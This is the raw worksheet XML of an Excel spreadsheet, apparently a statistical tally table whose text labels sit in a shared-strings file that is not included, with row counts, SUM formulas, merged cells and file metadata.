        <v>51</v>
      </c>
    </row>
    <row r="79" ht="15.75">
      <c r="C79" s="57" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="80" ht="14.25">
      <c r="C80" s="56" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="81" ht="15.75">
      <c r="C81" s="57" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="82" ht="14.25">
      <c r="C82" s="56" t="s">
        <v>73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1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0" topLeftCell="A1">
      <pane xSplit="7" ySplit="7" topLeftCell="H8" activePane="bottomRight" state="frozen"/>
      <selection pane="bottomRight" activeCell="Z11" sqref="Z11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="4.375" style="4" customWidth="1"/>
    <col min="2" max="2" width="9.50390625" style="4" customWidth="1"/>
    <col min="3" max="3" width="8.25390625" style="4" customWidth="1"/>
    <col min="4" max="4" width="4.875" style="4" customWidth="1"/>
    <col min="5" max="6" width="5.125" style="4" customWidth="1"/>
    <col min="7" max="20" width="4.625" style="5" customWidth="1"/>
    <col min="21" max="21" width="4.75390625" style="5" customWidth="1"/>
    <col min="22" max="22" width="5.75390625" style="4" customWidth="1"/>
    <col min="23" max="24" width="7.50390625" style="4" customWidth="1"/>
    <col min="25" max="16384" width="9.00390625" style="4" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" ht="15.75" customHeight="1">
      <c r="A1" s="6" t="s">
        <v>74</v>
      </c>
      <c r="B1" s="7"/>
    </row>
    <row r="2" spans="1:23" ht="24.75" customHeight="1">
      <c r="A2" s="8" t="s">
        <v>75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s="1" customFormat="1" ht="25.5" customHeight="1">
      <c r="A3" s="10" t="s">
        <v>76</v>
      </c>
      <c r="B3" s="10" t="s">
        <v>77</v>
      </c>
      <c r="C3" s="10" t="s">
        <v>78</v>
      </c>
      <c r="D3" s="10" t="s">
        <v>79</v>
      </c>
      <c r="E3" s="10" t="s">
        <v>80</v>
      </c>
      <c r="F3" s="10" t="s">
        <v>81</v>
      </c>
      <c r="G3" s="11" t="s">
        <v>82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s="1" customFormat="1" ht="24" customHeight="1">
      <c r="A4" s="10"/>
      <c r="B4" s="10"/>
      <c r="C4" s="10"/>
      <c r="D4" s="10"/>
      <c r="E4" s="10"/>
      <c r="F4" s="10"/>
      <c r="G4" s="12" t="s">
        <v>83</v>
      </c>
      <c r="H4" s="13" t="s">
        <v>84</v>
      </c>
      <c r="I4" s="13" t="s">
        <v>85</v>
      </c>
      <c r="J4" s="13" t="s">
        <v>86</v>
      </c>
      <c r="K4" s="13" t="s">
        <v>87</v>
      </c>
      <c r="L4" s="13" t="s">
        <v>88</v>
      </c>
      <c r="M4" s="13" t="s">
        <v>89</v>
      </c>
      <c r="N4" s="13" t="s">
        <v>90</v>
      </c>
      <c r="O4" s="13" t="s">
        <v>91</v>
      </c>
      <c r="P4" s="13" t="s">
        <v>92</v>
      </c>
      <c r="Q4" s="13" t="s">
        <v>93</v>
      </c>
      <c r="R4" s="13" t="s">
        <v>94</v>
      </c>
      <c r="S4" s="13" t="s">
        <v>95</v>
      </c>
      <c r="T4" s="13" t="s">
        <v>96</v>
      </c>
      <c r="U4" s="13" t="s">
        <v>97</v>
      </c>
      <c r="V4" s="43" t="s">
        <v>98</v>
      </c>
      <c r="W4" s="43" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="5" spans="1:23" s="1" customFormat="1" ht="22.5" customHeight="1">
      <c r="A5" s="10"/>
      <c r="B5" s="10"/>
      <c r="C5" s="10"/>
      <c r="D5" s="10"/>
      <c r="E5" s="10"/>
      <c r="F5" s="10"/>
      <c r="G5" s="12" t="s">
        <v>100</v>
      </c>
      <c r="H5" s="14" t="s">
        <v>101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43"/>
    </row>
    <row r="6" spans="1:23" s="1" customFormat="1" ht="15" customHeight="1">
      <c r="A6" s="10"/>
      <c r="B6" s="10"/>
      <c r="C6" s="10"/>
      <c r="D6" s="10"/>
      <c r="E6" s="10"/>
      <c r="F6" s="10"/>
      <c r="G6" s="12"/>
      <c r="H6" s="15" t="s">
        <v>102</v>
      </c>
      <c r="I6" s="15" t="s">
        <v>103</v>
      </c>
      <c r="J6" s="15" t="s">
        <v>104</v>
      </c>
      <c r="K6" s="15" t="s">
        <v>105</v>
      </c>
      <c r="L6" s="15" t="s">
        <v>106</v>
      </c>
      <c r="M6" s="15" t="s">
        <v>107</v>
      </c>
      <c r="N6" s="15" t="s">
        <v>108</v>
      </c>
      <c r="O6" s="15" t="s">
        <v>109</v>
      </c>
      <c r="P6" s="41" t="s">
        <v>110</v>
      </c>
      <c r="Q6" s="44" t="s">
        <v>111</v>
      </c>
      <c r="R6" s="44" t="s">
        <v>112</v>
      </c>
      <c r="S6" s="44" t="s">
        <v>113</v>
      </c>
      <c r="T6" s="15" t="s">
        <v>114</v>
      </c>
      <c r="U6" s="45" t="s">
        <v>115</v>
      </c>
      <c r="V6" s="41" t="s">
        <v>116</v>
      </c>
      <c r="W6" s="43"/>
    </row>
    <row r="7" spans="1:23" s="1" customFormat="1" ht="16.5" customHeight="1">
      <c r="A7" s="10"/>
      <c r="B7" s="10"/>
      <c r="C7" s="10"/>
      <c r="D7" s="10"/>
      <c r="E7" s="10"/>
      <c r="F7" s="10"/>
      <c r="G7" s="12"/>
      <c r="H7" s="15"/>
      <c r="I7" s="15"/>
      <c r="J7" s="15"/>
      <c r="K7" s="15"/>
      <c r="L7" s="15"/>
      <c r="M7" s="15"/>
      <c r="N7" s="15"/>
      <c r="O7" s="15"/>
      <c r="P7" s="42"/>
      <c r="Q7" s="44"/>
      <c r="R7" s="44"/>
      <c r="S7" s="44"/>
      <c r="T7" s="15"/>
      <c r="U7" s="42"/>
      <c r="V7" s="42"/>
      <c r="W7" s="43"/>
    </row>
    <row r="8" spans="1:23" s="1" customFormat="1" ht="22.5" customHeight="1">
      <c r="A8" s="16">
        <v>1</v>
      </c>
      <c r="B8" s="17" t="s">
        <v>117</v>
      </c>
      <c r="C8" s="18" t="s">
        <v>118</v>
      </c>
      <c r="D8" s="19" t="s">
        <v>119</v>
      </c>
      <c r="E8" s="19" t="s">
        <v>120</v>
      </c>
      <c r="F8" s="20" t="s">
        <v>121</v>
      </c>
      <c r="G8" s="21">
        <v>29</v>
      </c>
      <c r="H8" s="22">
        <v>3</v>
      </c>
      <c r="I8" s="22">
        <v>2</v>
      </c>
      <c r="J8" s="22">
        <v>1</v>
      </c>
      <c r="K8" s="22">
        <v>2</v>
      </c>
      <c r="L8" s="22">
        <v>2</v>
      </c>
      <c r="M8" s="22">
        <v>1</v>
      </c>
      <c r="N8" s="22">
        <v>1</v>
      </c>
      <c r="O8" s="22"/>
      <c r="P8" s="22">
        <v>1</v>
      </c>
      <c r="Q8" s="46"/>
      <c r="R8" s="44"/>
      <c r="S8" s="44"/>
      <c r="T8" s="15"/>
      <c r="U8" s="47"/>
      <c r="V8" s="15"/>
      <c r="W8" s="48"/>
    </row>
    <row r="9" spans="1:23" s="2" customFormat="1" ht="24">
      <c r="A9" s="23"/>
      <c r="B9" s="17"/>
      <c r="C9" s="18"/>
      <c r="D9" s="19"/>
      <c r="E9" s="19"/>
      <c r="F9" s="20" t="s">
        <v>122</v>
      </c>
      <c r="G9" s="21"/>
      <c r="H9" s="22">
        <v>3</v>
      </c>
      <c r="I9" s="22">
        <v>2</v>
      </c>
      <c r="J9" s="22">
        <v>2</v>
      </c>
      <c r="K9" s="22">
        <v>2</v>
      </c>
      <c r="L9" s="22">
        <v>2</v>
      </c>
      <c r="M9" s="22"/>
      <c r="N9" s="22">
        <v>2</v>
      </c>
      <c r="O9" s="22"/>
      <c r="P9" s="22">
        <v>2</v>
      </c>
      <c r="Q9" s="46">
        <v>1</v>
      </c>
      <c r="R9" s="46"/>
      <c r="S9" s="46"/>
      <c r="T9" s="22"/>
      <c r="U9" s="22"/>
      <c r="V9" s="49"/>
      <c r="W9" s="50" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="10" spans="1:23" s="2" customFormat="1" ht="24" customHeight="1">
      <c r="A10" s="23"/>
      <c r="B10" s="17"/>
      <c r="C10" s="18" t="s">
        <v>124</v>
      </c>
      <c r="D10" s="19" t="s">
        <v>119</v>
      </c>
      <c r="E10" s="19" t="s">
        <v>120</v>
      </c>
      <c r="F10" s="20" t="s">
        <v>125</v>
      </c>
      <c r="G10" s="24">
        <v>61</v>
      </c>
      <c r="H10" s="25">
        <v>3</v>
      </c>
      <c r="I10" s="25">
        <v>5</v>
      </c>
      <c r="J10" s="25">
        <v>4</v>
      </c>
      <c r="K10" s="25">
        <v>5</v>
      </c>
      <c r="L10" s="25">
        <v>2</v>
      </c>
      <c r="M10" s="25">
        <v>2</v>
      </c>
      <c r="N10" s="25"/>
      <c r="O10" s="25">
        <v>1</v>
      </c>
      <c r="P10" s="25">
        <v>1</v>
      </c>
      <c r="Q10" s="25"/>
      <c r="R10" s="25"/>
      <c r="S10" s="25"/>
      <c r="T10" s="25">
        <v>1</v>
      </c>
      <c r="U10" s="25"/>
      <c r="V10" s="21"/>
      <c r="W10" s="48"/>
    </row>
    <row r="11" spans="1:23" s="2" customFormat="1" ht="24">
      <c r="A11" s="23"/>
      <c r="B11" s="17"/>
      <c r="C11" s="18"/>
      <c r="D11" s="19"/>
      <c r="E11" s="19"/>
      <c r="F11" s="20" t="s">
        <v>126</v>
      </c>
      <c r="G11" s="26"/>
      <c r="H11" s="25">
        <v>5</v>
      </c>
      <c r="I11" s="25">
        <v>6</v>
      </c>
      <c r="J11" s="25">
        <v>4</v>
      </c>
      <c r="K11" s="25">
        <v>7</v>
      </c>
      <c r="L11" s="25">
        <v>5</v>
      </c>
      <c r="M11" s="25">
        <v>5</v>
      </c>
      <c r="N11" s="25">
        <v>1</v>
      </c>
      <c r="O11" s="25">
        <v>2</v>
      </c>
      <c r="P11" s="25"/>
      <c r="Q11" s="25">
        <v>1</v>
      </c>
      <c r="R11" s="25"/>
      <c r="S11" s="25"/>
      <c r="T11" s="25">
        <v>1</v>
      </c>
      <c r="U11" s="25"/>
      <c r="V11" s="21"/>
      <c r="W11" s="14" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="12" spans="1:23" s="2" customFormat="1" ht="21.75" customHeight="1">
      <c r="A12" s="23"/>
      <c r="B12" s="17"/>
      <c r="C12" s="18" t="s">
        <v>128</v>
      </c>
      <c r="D12" s="19" t="s">
        <v>119</v>
      </c>
      <c r="E12" s="19" t="s">
        <v>120</v>
      </c>
      <c r="F12" s="20" t="s">
        <v>129</v>
      </c>
      <c r="G12" s="24">
        <v>104</v>
      </c>
      <c r="H12" s="25">
        <v>19</v>
      </c>
      <c r="I12" s="25">
        <v>12</v>
      </c>
      <c r="J12" s="25">
        <v>3</v>
      </c>
      <c r="K12" s="25"/>
      <c r="L12" s="25"/>
      <c r="M12" s="25"/>
      <c r="N12" s="25"/>
      <c r="O12" s="25"/>
      <c r="P12" s="25"/>
      <c r="Q12" s="25">
        <v>1</v>
      </c>
      <c r="R12" s="51">
        <v>1</v>
      </c>
      <c r="S12" s="25"/>
      <c r="T12" s="25">
        <v>1</v>
      </c>
      <c r="U12" s="25"/>
      <c r="V12" s="21">
        <v>2</v>
      </c>
      <c r="W12" s="48"/>
    </row>
    <row r="13" spans="1:23" s="2" customFormat="1" ht="24.75" customHeight="1">
      <c r="A13" s="23"/>
      <c r="B13" s="17"/>
      <c r="C13" s="18"/>
      <c r="D13" s="19"/>
      <c r="E13" s="19"/>
      <c r="F13" s="20" t="s">
        <v>130</v>
      </c>
      <c r="G13" s="26"/>
      <c r="H13" s="25">
        <v>28</v>
      </c>
      <c r="I13" s="25">
        <v>17</v>
      </c>
      <c r="J13" s="25">
        <v>4</v>
      </c>
      <c r="K13" s="25"/>
      <c r="L13" s="25"/>
      <c r="M13" s="25"/>
      <c r="N13" s="25"/>
      <c r="O13" s="25"/>
      <c r="P13" s="25"/>
      <c r="Q13" s="25">
        <v>4</v>
      </c>
      <c r="R13" s="51">
        <v>3</v>
      </c>
      <c r="S13" s="25">
        <v>2</v>
      </c>
      <c r="T13" s="25">
        <v>4</v>
      </c>
      <c r="U13" s="25"/>
      <c r="V13" s="21">
        <v>3</v>
      </c>
      <c r="W13" s="14" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="14" spans="1:23" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="A14" s="23"/>
      <c r="B14" s="17"/>
      <c r="C14" s="27" t="s">
        <v>131</v>
      </c>
      <c r="D14" s="28" t="s">
        <v>132</v>
      </c>
      <c r="E14" s="28" t="s">
        <v>133</v>
      </c>
      <c r="F14" s="20" t="s">
        <v>134</v>
      </c>
      <c r="G14" s="24">
        <v>3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51"/>
      <c r="S14" s="25"/>
      <c r="T14" s="25"/>
      <c r="U14" s="25">
        <v>1</v>
      </c>
      <c r="V14" s="21"/>
      <c r="W14" s="14"/>
    </row>
    <row r="15" spans="1:23" s="2" customFormat="1" ht="27.75" customHeight="1">
      <c r="A15" s="23"/>
      <c r="B15" s="17"/>
      <c r="C15" s="29"/>
      <c r="D15" s="30"/>
      <c r="E15" s="30"/>
      <c r="F15" s="20" t="s">
        <v>135</v>
      </c>
      <c r="G15" s="26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51"/>
      <c r="S15" s="25"/>
      <c r="T15" s="25"/>
      <c r="U15" s="25">
        <v>2</v>
      </c>
      <c r="V15" s="21"/>
      <c r="W15" s="14" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="16" spans="1:23" ht="34.5">
      <c r="A16" s="31"/>
      <c r="B16" s="17"/>
      <c r="C16" s="10" t="s">
        <v>136</v>
      </c>
      <c r="D16" s="32" t="s">
        <v>119</v>
      </c>
      <c r="E16" s="32" t="s">
        <v>120</v>
      </c>
      <c r="F16" s="20" t="s">
        <v>137</v>
      </c>
      <c r="G16" s="25">
        <v>3</v>
      </c>
      <c r="H16" s="33">
        <v>2</v>
      </c>
      <c r="I16" s="33">
        <v>1</v>
      </c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52"/>
      <c r="W16" s="48"/>
    </row>
    <row r="17" spans="1:23" s="3" customFormat="1" ht="21" customHeight="1">
      <c r="A17" s="34" t="s">
        <v>138</v>
      </c>
      <c r="B17" s="34"/>
      <c r="C17" s="34"/>
      <c r="D17" s="34"/>
      <c r="E17" s="34"/>
      <c r="F17" s="34"/>
      <c r="G17" s="25">
        <f aca="true" t="shared" si="0" ref="G17:V17">SUM(G8:G16)</f>
        <v>200</v>
      </c>
      <c r="H17" s="35">
        <f t="shared" si="0"/>
        <v>63</v>
      </c>
      <c r="I17" s="35">
        <f t="shared" si="0"/>
        <v>45</v>
      </c>
      <c r="J17" s="35">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="K17" s="35">
        <f t="shared" si="0"/>
        <v>16</v>
      </c>
      <c r="L17" s="35">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="M17" s="35">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="N17" s="35">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="O17" s="35">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="P17" s="35">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="Q17" s="35">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="R17" s="35">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="S17" s="35">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="T17" s="35">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="U17" s="35">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="V17" s="35">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="W17" s="53"/>
    </row>
    <row r="18" spans="1:23" ht="18" customHeight="1">
      <c r="A18" s="36" t="s">
        <v>139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54"/>
      <c r="W18" s="3"/>
    </row>
    <row r="19" spans="1:23" ht="31.5" customHeight="1">
      <c r="A19" s="39" t="s">
        <v>140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</row>
    <row r="20" spans="1:21" ht="14.2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</row>
    <row r="21" spans="1:21" ht="14.2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</row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="49">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A2:W2"/>
    <mergeCell ref="G3:W3"/>
    <mergeCell ref="H5:U5"/>
    <mergeCell ref="A17:F17"/>
    <mergeCell ref="A19:W19"/>
    <mergeCell ref="A20:U20"/>
    <mergeCell ref="A21:U21"/>
    <mergeCell ref="A3:A7"/>
    <mergeCell ref="A8:A16"/>
    <mergeCell ref="B3:B7"/>
    <mergeCell ref="B8:B16"/>
    <mergeCell ref="C3:C7"/>
    <mergeCell ref="C8:C9"/>
    <mergeCell ref="C10:C11"/>
    <mergeCell ref="C12:C13"/>
    <mergeCell ref="C14:C15"/>
    <mergeCell ref="D3:D7"/>
    <mergeCell ref="D8:D9"/>
    <mergeCell ref="D10:D11"/>
    <mergeCell ref="D12:D13"/>
    <mergeCell ref="D14:D15"/>
    <mergeCell ref="E3:E7"/>
    <mergeCell ref="E8:E9"/>
    <mergeCell ref="E10:E11"/>
    <mergeCell ref="E12:E13"/>
    <mergeCell ref="E14:E15"/>
    <mergeCell ref="F3:F7"/>
    <mergeCell ref="G5:G7"/>
    <mergeCell ref="G8:G9"/>
    <mergeCell ref="G10:G11"/>
    <mergeCell ref="G12:G13"/>
    <mergeCell ref="G14:G15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4:W7"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.5902777777777778" right="0.39305555555555555" top="0.5506944444444445" bottom="0.23958333333333334" header="0.3104166666666667" footer="0.3305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2019-08-10T07:45:42Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-10-29T00:44:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-16T02:30:49Z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CB108EB1EB794617A448C11A28E313CD</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="KSOReadingLayo">
    <vt:bool>true</vt:bool>
  </property>
</Properties>
</file>